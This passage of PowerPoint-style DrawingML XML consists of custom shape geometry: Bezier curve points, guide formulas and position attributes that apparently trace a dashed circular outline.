                    <a:pt x="2123" y="1224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="1224"/>
                    <a:pt x="2118" y="1226"/>
                    <a:pt x="2118" y="1228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="1228"/>
                    <a:pt x="2118" y="1228"/>
                    <a:pt x="2118" y="1228"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="1188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="1195"/>
                    <a:pt x="2122" y="1201"/>
                    <a:pt x="2121" y="1208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="1210"/>
                    <a:pt x="2122" y="1212"/>
                    <a:pt x="2124" y="1212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="1213"/>
                    <a:pt x="2129" y="1211"/>
                    <a:pt x="2129" y="1209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1202"/>
                    <a:pt x="2131" y="1196"/>
                    <a:pt x="2131" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="1187"/>
                    <a:pt x="2130" y="1185"/>
                    <a:pt x="2128" y="1185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1184"/>
                    <a:pt x="2124" y="1186"/>
                    <a:pt x="2123" y="1188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="1148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="1155"/>
                    <a:pt x="2126" y="1162"/>
                    <a:pt x="2125" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1170"/>
                    <a:pt x="2127" y="1172"/>
                    <a:pt x="2129" y="1173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1173"/>
                    <a:pt x="2133" y="1171"/>
                    <a:pt x="2133" y="1169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1162"/>
                    <a:pt x="2135" y="1156"/>
                    <a:pt x="2135" y="1149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1147"/>
                    <a:pt x="2134" y="1145"/>
                    <a:pt x="2131" y="1145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1145"/>
                    <a:pt x="2127" y="1146"/>
                    <a:pt x="2127" y="1148"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1115"/>
                    <a:pt x="2129" y="1122"/>
                    <a:pt x="2128" y="1128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1131"/>
                    <a:pt x="2130" y="1133"/>
                    <a:pt x="2132" y="1133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1133"/>
                    <a:pt x="2136" y="1131"/>
                    <a:pt x="2136" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1122"/>
                    <a:pt x="2137" y="1116"/>
                    <a:pt x="2137" y="1109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1107"/>
                    <a:pt x="2136" y="1105"/>
                    <a:pt x="2133" y="1105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1105"/>
                    <a:pt x="2129" y="1106"/>
                    <a:pt x="2129" y="1109"/>
                  </a:cubicBezTo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"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4861104" y="2354281"/>
              <a:ext cx="3214033" cy="3212126"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2132 w 2138"/>
                <a:gd name="T1" fmla="*/ 1011 h 2137"/>
                <a:gd name="T2" fmla="*/ 2111 w 2138"/>
                <a:gd name="T3" fmla="*/ 869 h 2137"/>
                <a:gd name="T4" fmla="*/ 2096 w 2138"/>
                <a:gd name="T5" fmla="*/ 786 h 2137"/>
                <a:gd name="T6" fmla="*/ 2062 w 2138"/>
                <a:gd name="T7" fmla="*/ 696 h 2137"/>
                <a:gd name="T8" fmla="*/ 2025 w 2138"/>
                <a:gd name="T9" fmla="*/ 599 h 2137"/>
                <a:gd name="T10" fmla="*/ 1981 w 2138"/>
                <a:gd name="T11" fmla="*/ 519 h 2137"/>
                <a:gd name="T12" fmla="*/ 1920 w 2138"/>
                <a:gd name="T13" fmla="*/ 435 h 2137"/>
                <a:gd name="T14" fmla="*/ 1849 w 2138"/>
                <a:gd name="T15" fmla="*/ 338 h 2137"/>
                <a:gd name="T16" fmla="*/ 1771 w 2138"/>
                <a:gd name="T17" fmla="*/ 274 h 2137"/>
                <a:gd name="T18" fmla="*/ 1694 w 2138"/>
                <a:gd name="T19" fmla="*/ 211 h 2137"/>
                <a:gd name="T20" fmla="*/ 1597 w 2138"/>
                <a:gd name="T21" fmla="*/ 139 h 2137"/>
                <a:gd name="T22" fmla="*/ 1504 w 2138"/>
                <a:gd name="T23" fmla="*/ 101 h 2137"/>
                <a:gd name="T24" fmla="*/ 1408 w 2138"/>
                <a:gd name="T25" fmla="*/ 59 h 2137"/>
                <a:gd name="T26" fmla="*/ 1320 w 2138"/>
                <a:gd name="T27" fmla="*/ 34 h 2137"/>
                <a:gd name="T28" fmla="*/ 1177 w 2138"/>
                <a:gd name="T29" fmla="*/ 13 h 2137"/>
                <a:gd name="T30" fmla="*/ 1094 w 2138"/>
                <a:gd name="T31" fmla="*/ 4 h 2137"/>
                <a:gd name="T32" fmla="*/ 978 w 2138"/>
                <a:gd name="T33" fmla="*/ 12 h 2137"/>
                <a:gd name="T34" fmla="*/ 894 w 2138"/>
                <a:gd name="T35" fmla="*/ 18 h 2137"/>
                <a:gd name="T36" fmla="*/ 799 w 2138"/>
                <a:gd name="T37" fmla="*/ 34 h 2137"/>
                <a:gd name="T38" fmla="*/ 706 w 2138"/>
                <a:gd name="T39" fmla="*/ 72 h 2137"/>
                <a:gd name="T40" fmla="*/ 611 w 2138"/>
                <a:gd name="T41" fmla="*/ 103 h 2137"/>
                <a:gd name="T42" fmla="*/ 493 w 2138"/>
                <a:gd name="T43" fmla="*/ 178 h 2137"/>
                <a:gd name="T44" fmla="*/ 422 w 2138"/>
                <a:gd name="T45" fmla="*/ 223 h 2137"/>
                <a:gd name="T46" fmla="*/ 346 w 2138"/>
                <a:gd name="T47" fmla="*/ 282 h 2137"/>
                <a:gd name="T48" fmla="*/ 268 w 2138"/>
                <a:gd name="T49" fmla="*/ 373 h 2137"/>
                <a:gd name="T50" fmla="*/ 200 w 2138"/>
                <a:gd name="T51" fmla="*/ 453 h 2137"/>
                <a:gd name="T52" fmla="*/ 150 w 2138"/>
                <a:gd name="T53" fmla="*/ 530 h 2137"/>
                <a:gd name="T54" fmla="*/ 106 w 2138"/>
                <a:gd name="T55" fmla="*/ 624 h 2137"/>
                <a:gd name="T56" fmla="*/ 54 w 2138"/>
                <a:gd name="T57" fmla="*/ 733 h 2137"/>
                <a:gd name="T58" fmla="*/ 32 w 2138"/>
                <a:gd name="T59" fmla="*/ 827 h 2137"/>
                <a:gd name="T60" fmla="*/ 17 w 2138"/>
                <a:gd name="T61" fmla="*/ 930 h 2137"/>
                <a:gd name="T62" fmla="*/ 0 w 2138"/>
                <a:gd name="T63" fmla="*/ 1049 h 2137"/>
                <a:gd name="T64" fmla="*/ 13 w 2138"/>
                <a:gd name="T65" fmla="*/ 1169 h 2137"/>
                <a:gd name="T66" fmla="*/ 12 w 2138"/>
                <a:gd name="T67" fmla="*/ 1230 h 2137"/>
                <a:gd name="T68" fmla="*/ 45 w 2138"/>
                <a:gd name="T69" fmla="*/ 1346 h 2137"/>
                <a:gd name="T70" fmla="*/ 73 w 2138"/>
                <a:gd name="T71" fmla="*/ 1446 h 2137"/>
                <a:gd name="T72" fmla="*/ 109 w 2138"/>
                <a:gd name="T73" fmla="*/ 1530 h 2137"/>
                <a:gd name="T74" fmla="*/ 162 w 2138"/>
                <a:gd name="T75" fmla="*/ 1619 h 2137"/>
                <a:gd name="T76" fmla="*/ 211 w 2138"/>
                <a:gd name="T77" fmla="*/ 1707 h 2137"/>
                <a:gd name="T78" fmla="*/ 308 w 2138"/>
                <a:gd name="T79" fmla="*/ 1808 h 2137"/>
                <a:gd name="T80" fmla="*/ 366 w 2138"/>
                <a:gd name="T81" fmla="*/ 1869 h 2137"/>
                <a:gd name="T82" fmla="*/ 438 w 2138"/>
                <a:gd name="T83" fmla="*/ 1926 h 2137"/>
                <a:gd name="T84" fmla="*/ 527 w 2138"/>
                <a:gd name="T85" fmla="*/ 1981 h 2137"/>
                <a:gd name="T86" fmla="*/ 612 w 2138"/>
                <a:gd name="T87" fmla="*/ 2035 h 2137"/>
                <a:gd name="T88" fmla="*/ 745 w 2138"/>
                <a:gd name="T89" fmla="*/ 2079 h 2137"/>
                <a:gd name="T90" fmla="*/ 825 w 2138"/>
                <a:gd name="T91" fmla="*/ 2105 h 2137"/>
                <a:gd name="T92" fmla="*/ 919 w 2138"/>
                <a:gd name="T93" fmla="*/ 2127 h 2137"/>
                <a:gd name="T94" fmla="*/ 1059 w 2138"/>
                <a:gd name="T95" fmla="*/ 2129 h 2137"/>
                <a:gd name="T96" fmla="*/ 1143 w 2138"/>
                <a:gd name="T97" fmla="*/ 2131 h 2137"/>
                <a:gd name="T98" fmla="*/ 1235 w 2138"/>
                <a:gd name="T99" fmla="*/ 2121 h 2137"/>
                <a:gd name="T100" fmla="*/ 1341 w 2138"/>
                <a:gd name="T101" fmla="*/ 2098 h 2137"/>
                <a:gd name="T102" fmla="*/ 1434 w 2138"/>
                <a:gd name="T103" fmla="*/ 2074 h 2137"/>
                <a:gd name="T104" fmla="*/ 1559 w 2138"/>
                <a:gd name="T105" fmla="*/ 2010 h 2137"/>
                <a:gd name="T106" fmla="*/ 1633 w 2138"/>
                <a:gd name="T107" fmla="*/ 1972 h 2137"/>
                <a:gd name="T108" fmla="*/ 1715 w 2138"/>
                <a:gd name="T109" fmla="*/ 1920 h 2137"/>
                <a:gd name="T110" fmla="*/ 1801 w 2138"/>
                <a:gd name="T111" fmla="*/ 1837 h 2137"/>
                <a:gd name="T112" fmla="*/ 1870 w 2138"/>
                <a:gd name="T113" fmla="*/ 1765 h 2137"/>
                <a:gd name="T114" fmla="*/ 1932 w 2138"/>
                <a:gd name="T115" fmla="*/ 1692 h 2137"/>
                <a:gd name="T116" fmla="*/ 2005 w 2138"/>
                <a:gd name="T117" fmla="*/ 1568 h 2137"/>
                <a:gd name="T118" fmla="*/ 2048 w 2138"/>
                <a:gd name="T119" fmla="*/ 1499 h 2137"/>
                <a:gd name="T120" fmla="*/ 2079 w 2138"/>
                <a:gd name="T121" fmla="*/ 1407 h 2137"/>
                <a:gd name="T122" fmla="*/ 2111 w 2138"/>
                <a:gd name="T123" fmla="*/ 1267 h 2137"/>
                <a:gd name="T124" fmla="*/ 2128 w 2138"/>
                <a:gd name="T125" fmla="*/ 1185 h 2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38" h="2137">
                  <a:moveTo>
                    <a:pt x="2130" y="1067"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1075"/>
                    <a:pt x="2130" y="1082"/>
                    <a:pt x="2130" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1091"/>
                    <a:pt x="2131" y="1093"/>
                    <a:pt x="2134" y="1093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1093"/>
                    <a:pt x="2138" y="1091"/>
                    <a:pt x="2138" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1082"/>
                    <a:pt x="2138" y="1075"/>
                    <a:pt x="2138" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1065"/>
                    <a:pt x="2136" y="1063"/>
                    <a:pt x="2134" y="1063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="1063"/>
                    <a:pt x="2130" y="1065"/>
                    <a:pt x="2130" y="1067"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1027"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1034"/>
                    <a:pt x="2129" y="1040"/>
                    <a:pt x="2130" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1049"/>
                    <a:pt x="2131" y="1051"/>
                    <a:pt x="2134" y="1051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1051"/>
                    <a:pt x="2138" y="1049"/>
                    <a:pt x="2138" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1040"/>
                    <a:pt x="2137" y="1033"/>
                    <a:pt x="2137" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1025"/>
                    <a:pt x="2135" y="1023"/>
                    <a:pt x="2133" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1023"/>
                    <a:pt x="2129" y="1025"/>
                    <a:pt x="2129" y="1027"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="987"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="994"/>
                    <a:pt x="2128" y="1001"/>
                    <a:pt x="2128" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1009"/>
                    <a:pt x="2130" y="1011"/>
                    <a:pt x="2132" y="1011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1011"/>
                    <a:pt x="2136" y="1009"/>
                    <a:pt x="2136" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1000"/>
                    <a:pt x="2135" y="993"/>
                    <a:pt x="2135" y="987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="984"/>
                    <a:pt x="2133" y="983"/>
                    <a:pt x="2130" y="983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="983"/>
                    <a:pt x="2127" y="985"/>
                    <a:pt x="2127" y="987"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="948"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="954"/>
                    <a:pt x="2124" y="961"/>
                    <a:pt x="2125" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="970"/>
                    <a:pt x="2127" y="971"/>
                    <a:pt x="2129" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="971"/>
                    <a:pt x="2133" y="969"/>
                    <a:pt x="2133" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="960"/>
                    <a:pt x="2132" y="953"/>
                    <a:pt x="2131" y="947"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="944"/>
                    <a:pt x="2129" y="943"/>
                    <a:pt x="2126" y="943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="943"/>
                    <a:pt x="2123" y="945"/>
                    <a:pt x="2123" y="948"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="908"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="915"/>
                    <a:pt x="2120" y="921"/>
                    <a:pt x="2120" y="928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="930"/>
                    <a:pt x="2123" y="931"/>
                    <a:pt x="2125" y="931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="931"/>
                    <a:pt x="2129" y="929"/>
                    <a:pt x="2128" y="927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="920"/>
                    <a:pt x="2127" y="913"/>
                    <a:pt x="2126" y="907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="905"/>
                    <a:pt x="2123" y="903"/>
                    <a:pt x="2121" y="903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="904"/>
                    <a:pt x="2117" y="906"/>
                    <a:pt x="2118" y="908"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="869"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="875"/>
                    <a:pt x="2113" y="882"/>
                    <a:pt x="2114" y="888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2115" y="890"/>
                    <a:pt x="2117" y="892"/>
                    <a:pt x="2119" y="892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="891"/>
                    <a:pt x="2123" y="889"/>
                    <a:pt x="2122" y="887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="880"/>
                    <a:pt x="2120" y="874"/>
                    <a:pt x="2119" y="867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="865"/>
                    <a:pt x="2116" y="864"/>
                    <a:pt x="2114" y="864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="864"/>
                    <a:pt x="2111" y="867"/>
                    <a:pt x="2111" y="869"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="830"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="836"/>
                    <a:pt x="2106" y="843"/>
                    <a:pt x="2107" y="849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="851"/>
                    <a:pt x="2110" y="853"/>
                    <a:pt x="2112" y="852"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="852"/>
                    <a:pt x="2115" y="850"/>
                    <a:pt x="2115" y="847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="841"/>
                    <a:pt x="2112" y="834"/>
                    <a:pt x="2111" y="828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="826"/>
                    <a:pt x="2108" y="824"/>
                    <a:pt x="2106" y="825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="825"/>
                    <a:pt x="2102" y="827"/>
                    <a:pt x="2103" y="830"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="791"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="797"/>
                    <a:pt x="2096" y="804"/>
                    <a:pt x="2098" y="810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2099" y="812"/>
                    <a:pt x="2101" y="814"/>
                    <a:pt x="2103" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2105" y="813"/>
                    <a:pt x="2106" y="810"/>
                    <a:pt x="2106" y="808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="802"/>
                    <a:pt x="2103" y="795"/>
                    <a:pt x="2101" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100" y="787"/>
                    <a:pt x="2098" y="785"/>
                    <a:pt x="2096" y="786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="787"/>
                    <a:pt x="2092" y="789"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="791"/>
                    <a:pt x="2093" y="791"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="753"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="759"/>
                    <a:pt x="2086" y="765"/>
                    <a:pt x="2088" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2088" y="774"/>
                    <a:pt x="2090" y="775"/>
                    <a:pt x="2093" y="774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="774"/>
                    <a:pt x="2096" y="772"/>
                    <a:pt x="2095" y="769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="763"/>
                    <a:pt x="2092" y="757"/>
                    <a:pt x="2090" y="750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2089" y="748"/>
                    <a:pt x="2087" y="747"/>
                    <a:pt x="2085" y="748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="748"/>
                    <a:pt x="2081" y="751"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="753"/>
                    <a:pt x="2082" y="753"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2069" y="715"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2072" y="721"/>
                    <a:pt x="2074" y="727"/>
                    <a:pt x="2076" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="736"/>
                    <a:pt x="2079" y="737"/>
                    <a:pt x="2081" y="736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="735"/>
                    <a:pt x="2084" y="733"/>
                    <a:pt x="2083" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="725"/>
                    <a:pt x="2079" y="718"/>
                    <a:pt x="2077" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="710"/>
                    <a:pt x="2074" y="709"/>
                    <a:pt x="2072" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="710"/>
                    <a:pt x="2069" y="713"/>
                    <a:pt x="2069" y="715"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2055" y="677"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="684"/>
                    <a:pt x="2060" y="690"/>
                    <a:pt x="2062" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2063" y="698"/>
                    <a:pt x="2066" y="699"/>
                    <a:pt x="2068" y="698"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="698"/>
                    <a:pt x="2071" y="695"/>
                    <a:pt x="2070" y="693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="687"/>
                    <a:pt x="2065" y="681"/>
                    <a:pt x="2063" y="674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="672"/>
                    <a:pt x="2060" y="671"/>
                    <a:pt x="2058" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="673"/>
                    <a:pt x="2054" y="675"/>
                    <a:pt x="2055" y="677"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="641"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2043" y="647"/>
                    <a:pt x="2045" y="653"/>
                    <a:pt x="2048" y="659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2049" y="661"/>
                    <a:pt x="2051" y="662"/>
                    <a:pt x="2053" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="660"/>
                    <a:pt x="2056" y="658"/>
                    <a:pt x="2055" y="656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="650"/>
                    <a:pt x="2050" y="644"/>
                    <a:pt x="2047" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046" y="635"/>
                    <a:pt x="2044" y="635"/>
                    <a:pt x="2042" y="635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="636"/>
                    <a:pt x="2039" y="639"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="641"/>
                    <a:pt x="2040" y="641"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2026" y="611"/>
                    <a:pt x="2029" y="617"/>
                    <a:pt x="2032" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2033" y="625"/>
                    <a:pt x="2035" y="626"/>
                    <a:pt x="2037" y="625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2039" y="624"/>
                    <a:pt x="2040" y="621"/>
                    <a:pt x="2039" y="619"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="613"/>
                    <a:pt x="2033" y="607"/>
                    <a:pt x="2030" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2029" y="599"/>
                    <a:pt x="2027" y="598"/>
                    <a:pt x="2025" y="599"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="600"/>
                    <a:pt x="2022" y="603"/>
                    <a:pt x="2023" y="605"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="569"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2008" y="575"/>
                    <a:pt x="2011" y="581"/>
                    <a:pt x="2014" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2015" y="589"/>
                    <a:pt x="2018" y="590"/>
                    <a:pt x="2020" y="589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="588"/>
                    <a:pt x="2022" y="585"/>
                    <a:pt x="2021" y="583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="577"/>
                    <a:pt x="2015" y="571"/>
                    <a:pt x="2012" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2011" y="564"/>
                    <a:pt x="2009" y="563"/>
                    <a:pt x="2007" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="565"/>
                    <a:pt x="2004" y="567"/>
                    <a:pt x="2005" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="569"/>
                    <a:pt x="2005" y="569"/>
                    <a:pt x="2005" y="569"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="534"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="540"/>
                    <a:pt x="1992" y="546"/>
                    <a:pt x="1996" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1997" y="554"/>
                    <a:pt x="1999" y="554"/>
                    <a:pt x="2001" y="553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2003" y="552"/>
                    <a:pt x="2004" y="550"/>
                    <a:pt x="2003" y="548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="542"/>
                    <a:pt x="1996" y="536"/>
                    <a:pt x="1993" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1991" y="529"/>
                    <a:pt x="1989" y="528"/>
                    <a:pt x="1987" y="529"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1985" y="530"/>
                    <a:pt x="1985" y="533"/>
                    <a:pt x="1986" y="534"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="500"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1968" y="506"/>
                    <a:pt x="1972" y="512"/>
                    <a:pt x="1975" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1977" y="519"/>
                    <a:pt x="1979" y="520"/>
                    <a:pt x="1981" y="519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1983" y="518"/>
                    <a:pt x="1983" y="515"/>
                    <a:pt x="1982" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="508"/>
                    <a:pt x="1975" y="502"/>
